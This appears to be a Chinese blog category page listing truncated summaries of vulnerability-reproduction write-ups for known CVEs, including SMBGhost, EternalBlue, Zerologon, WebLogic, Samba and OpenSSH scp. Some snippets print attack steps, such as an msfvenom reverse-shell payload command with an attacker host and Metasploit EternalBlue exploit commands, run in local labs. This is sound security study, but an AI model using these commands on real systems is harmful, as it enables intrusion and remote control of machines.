
漏洞复现
文章平均质量分 70
BROTHERYY
学习是一件长久的事
展开
-
CVE-2021-3156 Sudo溢出漏洞复现
CVE-2021-3156漏洞介绍Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论原创 2021-01-31 11:30:04 · 2889 阅读 · 2 评论 -
CVE 2019-11043 php fastcgi 远程命令执行漏洞
CVE 2019-11043一、漏洞介绍二、漏洞名称三、漏洞类型四、漏洞危害:五、漏洞来源:六、公布时间:七、涉及应用版本:八、修复版本:九、应用语言:十、漏洞复现:一、漏洞介绍nginx + php-fpm 配置不当,当nginx配置文件中有fastcgi_split_path_info,却没有if(!-f documentrootdocument_rootdocumentrootfastcgi_script_name){return 404;}的时候就会导致远程代码执行。二、漏洞名称php f原创 2021-01-05 15:06:04 · 1404 阅读 · 0 评论 -
CVE 2017-7494 Samba远程代码执行漏洞
1. 漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。以下Samba版本受到影响:– 3.5.0- 4.6.4– 3.5.0- 4.5.10– 3.5.0- 4.4.142. 复现环境靶机:使用vulhub进行环境搭建攻击机:kali3. 漏洞复现1.运行测试环境docker-compose up -d2.使用kali msf框架msf5 > use exploit/lin原创 2020-10-20 10:01:18 · 944 阅读 · 0 评论 -
CVE 2017-8917 Joomla3.7 Core com_fields组件sql注入漏洞复现
1. 漏洞描述漏洞编号: CVE-2017-8917危害等级:危急漏洞简述:本漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入,sql注入对导致数据库中的敏感信息泄漏。影响版本: Joomla!3.7.0 Core2. 漏洞介绍这个漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql 注入,sql注入对导致数据库中的敏感信息泄原创 2020-10-19 11:22:22 · 2533 阅读 · 0 评论 -
CVE 2017-11882 office缓存溢出漏洞复现
1.漏洞概述针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。这里是poc地址https://github.com/unamer/CVE-2017-118822.影响版本office 2003office 2007office 2010office 2013office 20163.复现环境渗透机:kali + POC代码【上述github地址】靶机原创 2020-10-15 20:44:25 · 557 阅读 · 0 评论 -
CVE 2017-10271漏洞复现(写入webshell)
1.简介Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性,备受广大系统管理员的青睐2.复现环境可自建也可以使用vulhub和docker快速搭建环境3.漏洞复现访问http://IP:7001/,看到一个not found页面即启动成功漏洞触发的位置是在wls-wsat/CoordinatorPortType这个目录下,访问该目录进行截获数据包,修改为POST传递参数,写入成功后,访问原创 2020-10-14 10:19:23 · 1228 阅读 · 0 评论 -
redis 未授权漏洞以及利用
1.redis 介绍REmote DIctionary Server(Redis) 是完全开源免费的,遵守BSD协议,Redis是一个由Salvatore Sanfilippo写的key-value存储系统。。Redis 与其他的key - value 缓存产品有以下三个特点:1.Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。2.Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。3原创 2020-10-11 14:29:58 · 544 阅读 · 0 评论 -
CVE 2020-1472 Netlogon 特权提升漏洞
1.复现环境DC:os:windows 2012 serverip:192.168.236.132攻击机:os:kaliip:192.168.236.1302.影响版本Windows Server 2008 R2 for x64-based SystemsService Pack 1Windows Server 2008 R2 for x64-basedSystems Service Pack 1 (Server Core installation)Windows Server 201原创 2020-10-07 16:37:34 · 303 阅读 · 0 评论 -
CVE-2020-0796 SMBv3漏洞复现过程
1.扫描主机是否存在漏扫描py文件链接2.下载可利用的POCpoc地址3.在kali里使用msfvenom生成shell,lhost是攻击机ipmsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换5.进入msf开启监听use exploit/mu原创 2020-10-07 13:27:46 · 269 阅读 · 0 评论 -
phpstudy(小皮)默认配置解析漏洞
1.官网下载小皮面板2.本地安装3.漏洞复现在www目录下新建test.txt文件,写入phpinfo函数访问test.txt文件调入exp修复建议:1.等待官方升级2.更换为Apache或者装waf进行拦截3.将php-fpm.conf中的security.limit_extensions后面的值设置为.php...原创 2020-09-03 20:50:55 · 1247 阅读 · 0 评论 -
宝塔7.4.2漏洞复现
复现地址:本机环境复现版本:7.4.6破解到7.4.2访问bt面板现在的版本是7.4.6,这个是在网上找的破解版,能够复现7.4.2的漏洞输入ip:端口/pma 就直接进入到了phpmyadmin,正常情况下是访问不到的官方修复建议是升级,此次影响的版本是linux面板7.4.2,windows面板6.8,并且安装了phpmyadmin,或者禁止访问888端口...原创 2020-08-24 21:33:17 · 1438 阅读 · 0 评论 -
漏洞复现永恒之蓝MS-17010+修复
攻击机:192.168.20.101靶机:192.168.20.103使用msf的扫描模块,扫描靶机是否存在漏洞use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.20.103run使用攻击载荷进行攻击use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhosts 192.168.20.10原创 2020-08-20 14:43:37 · 1747 阅读 · 1 评论 -
通达OA未授权上传和文件包含RCE
一、漏洞情况此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞文件上传地址:http://localhost:80/ispirit/im/upload.php本地文件包含地址:http://localhost:80/ispirit/interface/gateway.php需要复现的朋友私信我,我分享链接给你安装很简单,一路next就OK。登录账号是:admin,密码为空。登录以后,抓取任意数据包,将数据包修改为下面的数据POST /ispirit/im/upload.ph原创 2020-08-20 09:44:23 · 812 阅读 · 0 评论 -
OpenSSH命令注入复现(CVE-2020-15778)
漏洞介绍SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。攻击者可以采用反引号(`)文件作为命令注入执行scp命令,命令将会发送到远程服务器并执行。影响版本version: <=openssh-8.3p1复现环境攻击机:192.168.20.101靶机:19原创 2020-08-04 09:51:40 · 2063 阅读 · 0 评论 -
Tomcat-幽灵猫GhostCat漏洞复现
Tomcat-幽灵猫GhostCat漏洞复现GhostCat漏洞大概是在2月份的时候暴露出来的,是由长亭发现的,详细情况可以进入长亭的官网进行查看。GhostCat 主要是存在文件读取和包含漏洞我们具体看下影响了哪些版本Apache Tomcat 9.x < 9.0.31Apache Tomcat 8.x < 8.5.51Apache Tomcat 7.x < 7.0...原创 2020-03-20 15:49:40 · 3692 阅读 · 0 评论